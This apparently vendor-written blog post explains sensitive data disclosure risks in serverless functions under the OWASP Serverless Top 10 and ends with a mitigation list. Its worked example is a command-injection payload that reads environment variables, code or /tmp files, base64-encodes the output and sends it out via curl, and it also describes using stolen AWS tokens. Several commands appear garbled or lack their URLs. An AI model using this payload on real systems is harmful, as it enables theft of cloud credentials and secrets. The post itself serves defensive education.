Great news! The OWASP Serverless Top 10 first release is out! And so, we continue with this blog post series, taking you through a journey to the new, unruled, land of serverless security. Where, a sheriff (your security controls) cannot be deployed, and both hackers and developers struggle to understand how they should act. First, I dove into the Event Injection and Broken Authentication attacks. In this 3rd post of the series I am going to talk about one of the most concerning risks for organizations, the OWASP Serverless Top 10 Sensitive Data Disclosure.

What is Considered Sensitive Data Disclosure?

We all hear about major data leaks, including recent ones like the breach of 50 Million Facebook users. While it is usually the end users whose privacy is compromised, the cost to the organizations could be very high as well. In extreme cases, a data breach could even completely shut down a company. Maybe the most relevant example would be Code Spaces, a former SaaS provider, that was accessed via its Amazon Elastic Compute Cloud control panel. The hacker, “… removed all EBS snapshots, S3 buckets, all AMIs, some EBS instances, and several machine instances,” eventually leading to this AWS-based company going out of business.

If you think to yourself “Well, I know all of that. But, how is it any different in serverless architecture?,” then you’re in the right place.

The Code Spaces attack was back in 2014, way before the term “serverless” appeared. at least in this context. However, some of the cloud services and resources that were accessed (e.g. S3) are part of a complete serverless solution. If we add a couple of functions to the equation (in math, this sentence would’ve made no sense), rearrange some letters (was it clear that I meant AMI→IAM?) and maybe add a few other 3-letter acronyms (e.g. EFS, SQS, SES, etc.) than the risk is the same. If the data is not well protected than it is at a big risk.

Now you’re probably saying “So? We have a few other data sources, but the attack vectors are the same,” and you’re not completely wrong (two points for you!). But, we must look at the big picture from different angles now.

The first, and maybe the more similar one, is handling our data. Protect data at rest and in transit. Encrypt your sensitive data in cloud storage, backups or databases. Your service provider usually gives you tools to do it easily and the right way. Use their KMS/Key Vault to securely store your data. Also make sure resources are configured correctly, so you won’t end up with a big leak or even shut down. Of course, make sure not to leak keys into your code repository or any other place that might end up in the wrong hands.

For data in transit, just make sure you are using TLS for all your connections (the default when calling the provider services).

The second, and most interesting part, is the data in our new serverless runtime environment. Wouldn’t we freak out if we discovered that our /etc/passwd and /etc/shadow files were compromised? whether in our servers or in the cloud (e.g. EC2). Guess what? They’re not sensitive anymore. I would even consider giving them to the attackers if they’d ask nicely. In fact, here.

Why is that? Because it now belongs to the service provider, and our functions run in a generic environment.

So, what do we need to protect? This is the most important question here. The answer is quite simple, but may vary for different providers.

A. Your Code

You might not have a server, but your code is stored on a cloud storage or cloud repository (which is not part of your responsibility) and is brought up with the runtime environment of the function. Its location depends on the runtime and the provider. For example:

On AWS NodeJS, you can find your code in the current directory (./), exactly where you’ll find your Python code on GCP, which is different than on AWS (/var/task). Here. I’ll let you explore by yourself. Use the following GCP function to run cat and ls command in any file or directory.

[code]curl -X POST -H “Content-Type: application/json” –data ‘{“ls”:”./”}’ | base64 –decode[/code][code]curl -X POST -H “Content-Type: application/json” –data ‘{“cat”:””}’ | base64 –decode[/code]

B. Your Secrets

Again, this varies between providers. But, if we take AWS as an example, then you have two parts. The one that you do not control but is given as a fact, which contains information about your function, such as its memory configuration, the log-group name, its version and more. But what’s most important is the functions’ tokens.

These tokens represent the functions’ permissions in the account. So, if the function has a permissive role in the account (most of them do), even like scanning a database or editing buckets, it could lead to a disaster in case it falls into the hands of the attacker. Attackers won’t even have to use your function any more, just simply run any aws cli with the token from their own computer (The aws profile stolen_keys contains the stolen tokens (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN):

Since these tokens exist whether you like it or not, you want to make sure that you limit the function roles to the exact action they need and not more. If the function reads from an S3 bucket, make sure it has a permission that only allows it to read one item and only from the specific bucket, or any resource for that matter.

The part that you do control is your own secrets passed to the function as environment variables. They will all be accessible through the same way; calling them through code or through a system process. If they contain sensitive information, you should consider encrypting them. This way, a system process won’t be able to see their real values (look back in the screenshot of the env). But, if the function is vulnerable to code injection, then the attacker could simply run the same code that you would have to use to read its value.

[code]ENCRYPTED = os.environ[‘third_party_api_key’][/code] [code]DECRYPTED = boto3.client(‘kms’).decrypt(CiphertextBlob=b64decode(ENCRYPTED))[‘Plaintext’][/code]

C. Your Files

In the serverless environment, the file system is read-only besides the /tmp folder, which is where your app is going to write its files, if any. Let me use my psychic powers again and tell you what you think now… Isn’t the serverless environment ephemeral and all files are deleted after the function completes its code execution? And again, you will not be completely wrong. It’s true, but not always. The function’s environment will only be completely deleted if the function remains idle for a period of time (on AWS that would be around 4 minutes). However, if there is at least one call in that time frame, it will probably land on the same environment as before. It’s not guaranteed, but some events in that time frame will get there. This is, of course, for performance reasons.

If your function is vulnerable and has used a file containing sensitive information, its data might be accessed and exfiltrated. To show you how it works, you can use the two curl commands I gave before. Both calls will write the data (base64) to the /tmp/b64 file.

When running the “ls” call first, you will see that the size of the /out/b64 file is 252 bytes. However, if you’ll run the “cat” call first, and then the ls, you will see that the file size is different and is 1496 bytes. Meaning that the result of the “ls” call will show the output of the “cat” call. Of course, if you’ll then run the “ls” call again, you will see the 252 are back, since the previous call was the “ls”.

When do we have to worry? If our code is vulnerable to any type of code injection; either through a process or an expression api (e.g. eval), whether the developer caused it or a dependency, then the attacker could access and/ or modify our sensitive data. As an example, let’s say that the function that I gave you was vulnerable (is it?) to command injection via the json value. An attacker could simply then run:

[code]–data ‘{“ls”:”/tmp; code=`$secret | base64 –wrap=0`; curl$code”}'[/code]

Where $secret can be “cat” for getting our code. Simply, “env”, to steal our token and secrets from the environment variables. Or, “cat /tmp/leftover.file”, for a sensitive file that was left, unprotected under the /tmp folder.

You tried it, didn’t you? The command above, prints the secret, encodes it as base64 and sends it to the attacker’s favourite location (e.g. Now, all they have to do is to decode it back and viola! You’re in the news… smile.

How to Prevent Sensitive Data Disclosure?

Protecting Against the OWASP Serverless Top 10 Sensitive Data Disclosure

Bottom line, what do we do about it? I’ll try to summarize:

  • Minimize storage of sensitive data to only what is absolutely necessary.
  • Always protect sensitive data at rest and in transit. Whenever possible, use the infrastructure providers crypto and key management services for stored data, secrets and environment variables (e.g. AWS Environment variable encryption, Handling Azure secrets, Storing secrets in GCP ).
  • Avoid leaking keys in your code repository and any other shared location.
  • Limit attack surface via restrictive permissions for your functions.
  • Perform code review and static analysis to avoid vulnerabilities in your code.
  • Monitor dependencies to avoid introducing known vulnerabilities into your app.
  • Delete sensitive files from /tmp when you finish using them.

Protego Labs serverless security solution would not only alert for sensitive data running in our source code or environment variables. It would also automate everything else for you, as part of your CI/CD and continuously.

Protego’s solution also detects, vulnerable dependencies, over-privileged functions, open resource, but also behavioral and attacks in runtime.


Don’t panic! Get educated by subscribing to this blog series.

Share This Article
Share on facebook
Share on linkedin
Share on twitter
Share on email

Join industry experts as they discuss all things serverless including industry news and best practice tips.